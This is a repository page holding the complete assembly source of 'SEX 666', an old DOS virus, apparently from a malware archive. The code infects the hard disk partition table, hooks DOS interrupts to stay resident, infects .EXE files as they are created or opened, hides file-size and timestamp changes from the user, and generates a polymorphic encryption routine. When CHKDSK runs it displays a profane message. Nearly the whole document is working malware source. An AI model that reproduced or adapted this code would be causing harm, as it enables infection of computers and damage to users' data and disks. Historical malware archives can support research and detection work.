MalwareSourceCode/MSDOS/S-Index/Virus.MSDOS.Unknown.sex666.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

1070 lines
22 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;------------------------------------------------------------------------------
;
; Virus Name: SEX 666
; Origin: Holland
; Eff Length: 2,048 bytes
; Type Code: PRhE - Parasitic Resident .EXE Infector
;
; General Comments:
; When the first program with SEX 666 is executed, SEX 666 will infect
; this partition table the first harddisk and install itself resident
; at the top of system memory, but below the 640k DOS boundary. Free
; memory as indicated by the DOS CHKDSK program, will decrease by 4112
; bytes. Interrupt 21h will be hooked by the virus.
;
; This first time the computer is booted from the first harddisk SEX 666
; will install itself resident above TOM but below the 640k DOS boundary.
; Total system memory as indicated by the DOS CHKDSK program, will
; decrease by 4096 bytes.
;
; After SEX 666 is resident, it will infect .EXE programs that are
; created with dos function 3ch or 5bh. Infected programs will increase
; in size by 2048 bytes, though the increase in file length will be
; hidden if SEX 666 is resident. The program's time will indicate 62
; seconds, but this will be hidden if the virus is resident.
;
;------------------------------------------------------------------------------
;
; Interrupt vectors
;
;------------------------------------------------------------------------------
iseg segment at 0
org 1ch*4
Int1Co dw 0 ; interrupt vector 21h
Int1Cs dw 0
org 21h*4
Int21o dw 0 ; interrupt vector 21h
Int21s dw 0
iseg ends
;------------------------------------------------------------------------------
;
; Constants
;
;------------------------------------------------------------------------------
VirusSize equ 800h ; size of virus
BootSize equ 2bh
;------------------------------------------------------------------------------
;
; Macros
;
;------------------------------------------------------------------------------
je_n macro dest ; je >128 bytes
local ok
jne ok
jmp dest
ok:
endm
jne_n macro dest ; jne >128 bytes
local ok
je ok
jmp dest
ok:
endm
dbw macro _byte1,_byte2,_word
db _byte1,_byte2
dw offset _word
endm
cseg segment public 'code'
assume cs:cseg,ds:cseg,es:cseg
;------------------------------------------------------------------------------
;
; Header of EXE-file
;
;------------------------------------------------------------------------------
Header equ $
Signature dw 5a4dh ; signature 'MZ'
PartPage dw 0 ; size of partitial page
PageCount dw 8 ; number of pages
ReloCount dw 0 ; number of relocation items
HeaderSize dw 2 ; size of header
MinMem dw 40h ; minimum memory needed
MaxMem dw 40h ; maximum memory needed
ExeSS dw 0 ; initial SS
ExeSP dw VirusSize ; initial SP
CheckSum dw 0 ; unused ???
ExeEntry equ this dword ; initial entry point
ExeIP dw offset Start ; initial IP
ExeCS dw 0 ; initial CS
ReloOffset dw 1ch ; offset of relocationtable
OverlayNr dw 0 ; number of overlay
CryptOfs equ OverlayNr ; offset Crypt
org BootSize
;------------------------------------------------------------------------------
;
; Bootsector startup
;
;------------------------------------------------------------------------------
Bootsector:
cli
xor bx,bx
mov ds,bx
mov ss,bx
mov sp,7c00h
sti
mov ax,ds:[413h]
sub ax,(VirusSize/400h)
mov ds:[413h],ax
mov cl,6
shl ax,cl
mov es,ax
mov ax,201h+(VirusSize/200h)
mov cx,2
mov dx,80h
int 13h
mov bx,offset StartUp
push es
push bx
retf
StartUp:cli
mov ax,offset Interrupt1C
xchg ax,ds:Int1Co
mov cs:OldInt1Co,ax
mov ax,cs
xchg ax,ds:Int1Cs
mov cs:OldInt1Cs,ax
mov cs:Count,182
sti
push ds
pop es
push cs
pop ds
mov si,offset Header
mov di,7c00h
mov cx,BootSize
cld
rep movsb
mov bx,7c00h
push es
push bx
retf
Interrupt1C:
dec cs:Count
jne Old1C
push ds
push ax
cli
xor ax,ax
mov ds,ax
mov ax,cs:OldInt1Co
mov ds:Int1Co,ax
mov ax,cs:OldInt1Cs
mov ds:Int1Cs,ax
mov ax,offset Interrupt21
xchg ax,ds:Int21o
mov cs:OldInt21o,ax
mov ax,cs
xchg ax,ds:Int21s
mov cs:OldInt21s,ax
mov cs:Handle1,0
mov cs:Handle2,0
sti
pop ax
pop ds
Old1C: jmp cs:OldInt1C
;------------------------------------------------------------------------------
;
; Manipilated functions
;
;------------------------------------------------------------------------------
Functions db 11h ; 1
dw offset FindFCB
db 12h ; 2
dw offset FindFCB
db 30h ; 3
dw offset Version
db 3ch ; 4
dw offset Create
db 3dh ; 5
dw offset Open
db 3eh ; 6
dw offset Close
db 42h ; 7
dw offset Seek
db 4bh ; 8
dw offset Exec
db 4eh ; 9
dw offset Find
db 4fh ; a
dw offset Find
db 5bh ; b
dw offset Create
db 6ch ; c
dw offset OpenCreate
FunctionCount equ 0ch
;------------------------------------------------------------------------------
;
; String data
;
;------------------------------------------------------------------------------
MemoryMsg db 'Insufficient memory',13,10,'$'
ChkDsk db 'CHKDSK'
;------------------------------------------------------------------------------
;
; Procedure to infect an EXE-file
; At the top of the EXE-file must be space to put the virus.
;
;------------------------------------------------------------------------------
Infect: push ax ; save registers
push bx
push cx
push dx
push ds
push cs ; ds=cs
pop ds
mov ax,4200h ; position read/write pointer
xor cx,cx ; at the end of the virus
mov dx,VirusSize
call DOS
call ReadHeader ; read orginal exe-header
add PageCount,VirusSize/200h ; adjust header for virus
mov ReloCount,0
mov HeaderSize,0
add MinMem,(10h+VirusSize)/10h
add MaxMem,(10h+VirusSize)/10h
jnc MaxOk
mov MaxMem,0ffffh
MaxOk: add ExeSS,VirusSize/10h
mov ExeIP,offset Main
mov ExeCS,0
mov ax,4200h ; position read/write pointer
xor cx,cx ; at the top of the virus
xor dx,dx
call DOS
call WriteHeader ; write header at the top of
jc InfErr
mov ax,5700h ; the virus
call DOS
mov ax,5701h
or cl,1fh
call DOS
InfErr: pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
ret ; return
;------------------------------------------------------------------------------
;
; The orginal interrupt 21h is redirected to this procedure
;
;------------------------------------------------------------------------------
FindFCB:call DOS ; call orginal interrupt
cmp al,0 ; error ?
jne Ret1
pushf ; save registers
push ax
push bx
push es
mov ah,2fh ; get DTA
call DOS
cmp byte ptr es:[bx],-1 ; extended fcb ?
jne FCBOk
add bx,8 ; yes, skip 8 bytes
FCBOk: mov al,es:[bx+16h] ; get file-time (low byte)
and al,1fh ; seconds
cmp al,1fh ; 62 seconds ?
jne FileOk ; no, file not infected
sub word ptr es:[bx+1ch],VirusSize ; adjust file-size
sbb word ptr es:[bx+1eh],0
jmp short Time
Find: call DOS ; call orginal interrupt
jc Ret1 ; error ?
pushf ; save registers
push ax
push bx
push es
mov ah,2fh
call DOS
mov al,es:[bx+16h] ; get file-time (low byte)
and al,1fh ; seconds
cmp al,1fh ; 62 seconds ?
jne FileOk ; no, file not infected
sub word ptr es:[bx+1ah],VirusSize ; change file-size
sbb word ptr es:[bx+1ch],0
Time: xor byte ptr es:[bx+16h],10h ; adjust file-time
FileOk: pop es ; restore registers
pop bx
pop ax
popf
Ret1: retf 2 ; return
Version:push cx ; installation check
push si ; ds = cs
push di
push es
push cs
pop es
mov si,offset Version ; compare an part of the
mov di,si ; code segment with the code
mov cx,VersionSize ; segment of the virus
cld
repe cmpsb
pop es
pop di
pop si
pop cx
jne Old21 ; not equal, do orginal int 21h
mov ax,0DEADh ; return DEAD signature
mov bx,offset Continue ; es:dx = continue
push cs
pop es
retf 2 ; return
VersionSize equ $-Version
Seek: or bx,bx ; bx=0 ?
jz Old21 ; yes, do orginal interrupt
cmp bx,cs:Handle1 ; bx=handle1 ?
je Stealth ; yes, use stealth
cmp bx,cs:Handle2 ; bx=handle2 ?
jne Old21 ; no, do orginal interrupt
Stealth:push cx ; save cx
or al,al ; seek from top of file ?
jnz Ok ; no, don't change cx:dx
add dx,VirusSize ; change cx:dx
adc cx,0
Ok: call DOS ; Execute orginal int 21h
pop cx ; restore cx
jc Ret1 ; Error ?
sub ax,VirusSize ; adjust dx:ax
sbb dx,0
jmp short Ret1 ; return
Close: or bx,bx ; bx=0 ?
je Old21 ; yes, do orginal interrupt
cmp bx,cs:Handle1 ; bx=handle1
jne Not1 ; no, check handle2
call Infect ; finish infection
mov cs:Handle1,0 ; handle1=unused
Not1: cmp bx,cs:Handle2 ; bx=handle2
jne Not2 ; no, do orginal interrupt
call Infect
mov cs:Handle2,0 ; handle2=unused
Not2: jmp short Old21 ; continue with orginal int
Interrupt21:
cmp cs:Disable,0
jne Old21
push bx ; after an int 21h instruction
push cx ; this procedure is started
mov bx,offset Functions
mov cx,FunctionCount
NxtFn: cmp ah,cs:[bx] ; search function
je Found
add bx,3
loop NxtFn
pop cx ; function not found
pop bx
Old21: inc cs:Cryptor
jmp cs:OldInt21
Found: push bp ; function found, start viral
mov bp,sp ; version of function
mov bx,cs:[bx+1]
xchg bx,ss:[bp+4]
pop bp
pop cx
ret
Create: cmp cs:Handle1,0 ; handle1=0 ?
jne Old21 ; No, can't do anything
call CheckName ; check for .exe extension
jc Old21 ; No, not an exe-file
ExtCr: call DOS ; Execute orginal interrupt
jc Ret2 ; Error ?
pushf ; save registers
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push cs
pop ds
push cs
pop es
mov bx,ax ; write virus to file
mov ax,4400h
call DOS
jc InRet
test dx,80h
jnz InRet
push bx
call Link
pop bx
mov si,offset WriteVirus
mov di,offset Header
mov cx,1ah
rep movsb
mov CryptOfs,offset Crypt
call Header
jc InErr ; Error ?
cmp ax,cx
jne InErr
mov Handle1,bx ; store handle
jmp short InRet
InErr: mov ax,4200h ; set read/write pointer to top
xor cx,cx ; of file
xor dx,dx
call DOS
mov ah,40h
xor cx,cx
call DOS
InRet: pop es ; restore registers
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
Ret2: retf 2 ; return
OpenCreate:
or al,al ; subfunction 0 ?
jne Fail ; no, do orginal interrupt
push dx
and dl,0f0h
cmp dl,020h
pop dx
je Replace
push ax ; save registers
push bx
push cx
push dx
mov ax,3d00h ; open file and close file to
mov dx,si ; check if file exists
call DOS
jc Error
mov bx,ax
mov ah,3eh
call DOS
Error: pop dx ; restore registers
pop cx
pop bx
pop ax
jnc Open ; open file, if file exists
Replace:cmp cs:Handle1,0 ; is handle1 0 ?
jne Fail ; no, do orginal interrupt
push dx ; save dx
mov dx,si
call CheckName ; check for .exe extension
pop dx ; restore dx
jc Fail
jmp ExtCr ; create if exe-file
Fail: jmp Old21 ; do orginal interrupt
Open: cmp al,1
je Fail
cmp cs:Handle2,0 ; handle1=0 ?
jne Fail ; No, can't do anything
call DOS ; Execute orginal interrupt
jc Ret3 ; Error ?
pushf ; save registers
push ax
push bx
push cx
push dx
push ds
push cs
pop ds
mov bx,ax ; read header of file
Ext2: mov ax,4400h
call DOS
jc Device
test dx,80h
jnz Device
mov ah,3fh
mov cx,1ch
xor dx,dx
call DOS
jc NoVir ; error ?
cmp ax,cx
jne NoVir
cmp Signature,5a4dh ; signature = 'MZ' ?
jne NoVir ; no, not infected
cmp HeaderSize,0 ; headersize = 0 ?
jne NoVir ; no, not infected
cmp ExeIP,offset Main ; ip = Start ?
jne NoVir ; no, not infected
cmp ExeCS,0 ; cx = 0 ?
jne NoVir ; no, not infected
mov Handle2,bx ; store handle
mov ax,4200h
xor cx,cx
mov dx,VirusSize ; seek to end of virus
jmp OpenOk
NoVir: mov ax,4200h
xor cx,cx
xor dx,dx
OpenOk: call DOS
Device: pop ds ; restore registers
pop dx
pop cx
pop bx
pop ax
popf
Ret3: retf 2 ; return
Exec: push ax
push cx
push si
push di
mov si,dx
mov di,offset ChkDsk
mov cx,100h
Next7: jcxz NotChk
mov ah,cs:[di]
Next8: lodsb
and al,0dfh
cmp al,ah
loopne Next8
push cx
push si
push di
mov cx,6
dec si
Next9: lodsb
and al,0dfh
inc di
cmp cs:[di-1],al
loope Next9
pop di
pop si
pop cx
jne Next7
cmp cs:Cryptor,1000h
jae NoMsg
push dx
push ds
push cs
pop ds
mov ah,9
mov dx,offset TextLine
call DOS
mov ah,9
mov dx,offset Message
call DOS
pop ds
pop dx
NoMsg: pop di
pop si
pop cx
pop ax
inc cs:Disable
call DOS
dec cs:Disable
jmp Ret3
NotChk: pop di
pop si
pop cx
pop ax
jmp Old21
;------------------------------------------------------------------------------
WriteVirus:
call CryptOfs ; encrypt
mov ah,40h ; write virus to file
mov cx,VirusSize
xor dx,dx
pushf
call cs:OldInt21
call CryptOfs ; decrypt
ret ; return
WriteHeader: ; write exe-header to file
mov ah,40h
jmp short Hdr
ReadHeader: ; read exe-header from file
mov ah,3fh
Hdr: mov cx,1ch
xor dx,dx
DOS: pushf ; call orginal interrupt
call cs:OldInt21
ret
CheckName: ; check for .exe
push ax ; save registers
push cx
push si
push di
xor ah,ah ; point found = 0
mov cx,100h ; max length filename = 100h
mov si,dx ; si = start of filename
cld
NxtChr: lodsb ; get byte
or al,al ; 0 ?
je EndName ; yes, check extension
cmp al,'\' ; \ ?
je Slash ; yes, point found = 0
cmp al,'.' ; . ?
je Point ; yes, point found = 1
loop NxtChr ; next character
jmp EndName ; check extension
Slash: xor ah,ah ; point found = 0
jmp NxtChr ; next character
Point: inc ah ; point found = 1
mov di,si ; di = start of extension
jmp NxtChr ; next character
EndName:or ah,ah ; point found = 0
je NotExe ; yes, not an exe-file
mov si,di ; si = start of extension
lodsw ; first 2 characters
and ax,0dfdfh ; uppercase
cmp ax,05845h ; EX ?
jne NotExe ; no, not an exe-file
lodsb ; 3rd character
and al,0dfh ; uppercase
cmp al,045h ; E ?
je ChkRet ; yes, return
NotExe: stc ; set carry flag
ChkRet: pop di ; restore registers
pop si
pop cx
pop ax
ret ; return
;------------------------------------------------------------------------------
;
; Linker for encryption procedure
;
;------------------------------------------------------------------------------
Part1 db 7,0
db 1, 09ch
db 1, 050h
db 1, 051h
db 1, 052h
db 1, 056h
db 1, 057h
db 1, 01eh
Part2 db 4,0
db 2, 00eh,01fh
db 2, 031h,0c0h
dbw 3, 0bah,Crypt-1ch
dbw 3, 0bfh,[1ch]
Part3 db 1,0
db 3, 0fch,0ebh,00eh
Part4 db 4,0
db 1, 0ach
db 2, 002h,0e0h
db 2, 0d0h,0cch
db 3, 030h,025h,047h
Part5 db 1,0
db 2, 0e2h,0f6h
Part6 db 1,0
db 4, 00bh,0d2h,074h,010h
Part7 db 2,0
dbw 3, 0beh,Crypt
dbw 3, 0b9h,Lastbyte-Crypt
Part8 db 1,0
db 10, 03bh,0d1h,073h,002h,08bh
db 0cah,02bh,0d1h,0ebh,0e2h
Part9 db 7,1
db 1, 09dh
db 1, 058h
db 1, 059h
db 1, 05ah
db 1, 05eh
db 1, 05fh
db 1, 01fh
Part10 db 1,0
db 1, 0c3h
Link: mov ax,Cryptor
mov cx,10 ; number of parts
mov di,offset Crypt ; destenation
mov si,offset Part1 ; source
Next1: push ax ; save registers
push cx
push di
cld
cmp byte ptr ds:[si+1],0
je Forward
push ax
push cx
push si
xor ax,ax
mov cl,[si]
xor ch,ch
add si,2
Next4: lodsb
add si,ax
add di,ax
loop Next4
dec di
std
pop si
pop cx
pop ax
Forward:mov Table[0],0100h ; initialize table
mov Table[2],0302h
mov Table[4],0504h
mov Table[6],0706h
mov bx,offset Table
mov cl,ds:[si] ; get number of instructions
xor ch,ch ; to shuffle
Next2: call Shuffle
loop Next2
pop di
mov cl,ds:[si] ; get next part
xor ch,ch
add si,2
cld
Next6: lodsb
xor ah,ah
add si,ax
add di,ax
loop Next6
pop cx ; restore register
pop ax
loop Next1 ; next
ret ; return
Shuffle:xor dx,dx ; shuffle instructions
div cx
push ax
push cx
push si
xchg si,dx
mov al,ds:[bx]
xchg al,ds:[bx+si]
xchg si,dx
inc bx
pushf
cld
mov cl,al
xor ax,ax
xor ch,ch
add si,2
jcxz First
Next5: lodsb
add si,ax
loop Next5
First: lodsb
xor ah,ah
mov cx,ax
popf
rep movsb
pop si
pop cx
pop ax
ret
;------------------------------------------------------------------------------
;
; This procedure is called when starting from an exe-file
;
;------------------------------------------------------------------------------
MemErr: mov ah,9 ; display message
mov dx,offset MemoryMsg
int 21h
mov ax,4cffh ; terminate with error-code 255
int 21h
Start: mov cs:SavedAX,ax ; save registers
mov cs:SavedDS,ds
push cs ; ds = cs
pop ds
mov ah,30h ; get dos-version (installation
int 21h ; check)
cmp ax,0DEADh ; virus installed ?
jne Install ; no, install
cmp bx,offset Continue
jne Install
mov ax,ds:SavedAX
mov es:SavedAX,ax
mov ax,ds:SavedDS
mov es:SavedDS,ax
push es ; push es and dx for far return
push bx
mov ax,cs ; ax=distenation segment
mov dx,cs ; dx=segment of orginal header
add dx,VirusSize/10h
retf ; start orginal exe-file
Install:mov ah,4ah ; get memory avail
mov bx,-1
int 21h
sub bx,(10h+VirusSize)/10h ; memory needed by virus
mov ah,4ah ; adjust memory block-size
int 21h
jc MemErr ; error ? yes, terminate
mov ah,48h ; allocate memory for virus
mov bx,VirusSize/10h
int 21h
jc MemErr ; error ? yes, terminate
mov es,ax
mov ax,201h
xor bx,bx
mov cx,1
mov dx,80h
int 13h
jc BootOk
mov si,offset BootSector
xor di,di
mov cx,BootSize
cld
repe cmpsb
je BootOk
mov di,1beh+8
mov cx,4
Next3: cmp word ptr es:[di+2],0
ja SectOk
cmp word ptr es:[di],1+(VirusSize/200h)
jbe BootOk
SectOk: loop Next3
push ds
push es
push es
pop ds
push cs
pop es
xor si,si
xor di,di
mov cx,BootSize
cld
rep movsb
mov ax,300h+(VirusSize/200h)
mov cx,2
int 13h
pop es
pop ds
jc BootOk
mov si,offset BootSector
xor di,di
mov cx,BootSize
cld
rep movsb
mov ax,301h
mov cx,1
int 13h
BootOk: mov ax,es
dec ax ; get segment of MCB
mov es,ax
mov word ptr es:[1],8 ; change owner
inc ax ; get segment of memory-block
mov es,ax ; es:dx = continue
mov dx,offset Continue
push es ; push es and ds for far return
push dx
xor si,si ; copy virus to memory-block
xor di,di
mov cx,VirusSize/2
cld
rep movsw
xor ax,ax ; ds = interrupt table
mov ds,ax
mov ax,ds:Int21o ; save interrupt 21h vector
mov es:OldInt21o,ax
mov ax,ds:Int21s
mov es:OldInt21s,ax
mov ds:Int21o,offset Interrupt21 ; store new interrupt vector
mov ds:Int21s,es
mov es:Handle1,0 ; clear handles
mov es:Handle2,0
push cs
pop ds
mov ax,cs ; ax=distenation segment
mov dx,cs ; dx=segment of orginal header
add dx,VirusSize/10h
retf ; start orginal exe-file
Continue:
mov ds,dx ; ds=dx
add ExeSS,ax ; adjust orginal SS
add ExeCS,ax ; adjust orginal CS
xor si,si ; copy orginal header to
xor di,di ; code segment
mov cx,0dh
cld
rep movsw
mov si,ReloOffset ; get offset of relocationtable
mov cx,ReloCount ; get number of relocationitems
add dx,HeaderSize ; get start of orginal exe-file
cld
jcxz Zero ; 0 relocation items ?
Next: push ax ; save ax
lodsw ; get offset of relocationitem
mov bx,ax
lodsw ; get segment of relocationitem
add ax,dx
mov es,ax
pop ax
add es:[bx],ax ; adjust relocationitem
loop Next ; next relocationitem
Zero: mov bx,PageCount ; get number of pages in file
cli ; disable interrupts
NxtPage:mov ds,dx ; ds = source segment
mov es,ax ; es = destenation segment
mov cx,100h ; cx = size of 1 page in words
xor si,si ; si = 0
xor di,di ; di = 0
rep movsw ; copy block
add ax,20h ; adjust destenation segment
add dx,20h ; adjust source segment
dec bx ; restore cx
jnz NxtPage ; next block
mov ss,cs:ExeSS ; set ss:sp
mov sp,cs:ExeSP
sti ; enable interrupts
mov ax,cs:SavedAX ; restore registers
mov ds,cs:SavedDS
mov es,cs:SavedDS
jmp cs:ExeEntry
;------------------------------------------------------------------------------
;
; Activation
;
;------------------------------------------------------------------------------
Message equ this byte
db 9,9,9,9,' SEX 666',13,10
db 9,9,9,9,' Fuck the Demon',13,10
db 13,10
db 9,9,9,9,' Greetings Bit Addict',13,10
TextLine equ this byte
db 13,10
db 9,9,9,9,'<27><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',13,10
db 13,10
db '$'
;------------------------------------------------------------------------------
;
; Encryption
;
;------------------------------------------------------------------------------
Crypt: db 58 dup(90h) ; this should be the encryption
Cryptor dw 0 ; change the encryption by
; changing this value
Main: call Crypt ; decrypt
jmp Start ; jump to Start
LastByte equ $ ; encryption stops here
;------------------------------------------------------------------------------
;
; Variables
;
;------------------------------------------------------------------------------
OldInt1C equ this dword ; orginal interrupt 8
OldInt1Co dw 0
OldInt1Cs dw 0
OldInt21 equ this dword ; orginal interrupt 21h
OldInt21o dw 0
OldInt21s dw 0
Disable db 0
Count equ this word ; timer count
SavedAX dw 0
SavedDS dw 0
Handle1 dw -1 ; Handle of exe-file created
Handle2 dw -1 ; Handle of exe-file opend
Table dw 0,0,0,0 ; Used by link
;------------------------------------------------------------------------------
;
; Orginal EXE-file
;
;------------------------------------------------------------------------------
org VirusSize
db 'MZ' ; header
dw 0 ; image size = 1024 bytes
dw 4
dw 0 ; relocation items = 0
dw 2 ; headersize = 20h
dw 40h ; minimum memory
dw 40h ; maximum memory
dw 0 ; ss
dw 400h ; sp
dw 0 ; chksum
dw 0 ; ip
dw 0 ; cs
dw 1ch ; offset relocation table
dw 0 ; overlay number
dw -1
dw -1
Orginal:mov ah,9 ; display warning
push cs
pop ds
mov dx,offset Warning-VirusSize-20h
int 21h
mov ax,4c00h
int 21h ; terminate
Warning equ this byte
db 13,10
db 'WARNING:',13,10
db 13,10
db 'SEX 666 virus is now memory resident and has now infected the',13,10
db 'partition table !!!!!',13,10
db 13,10
db '$'
cseg ends
sseg segment stack 'stack'
db 100h dup(?)
sseg ends
end Start

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>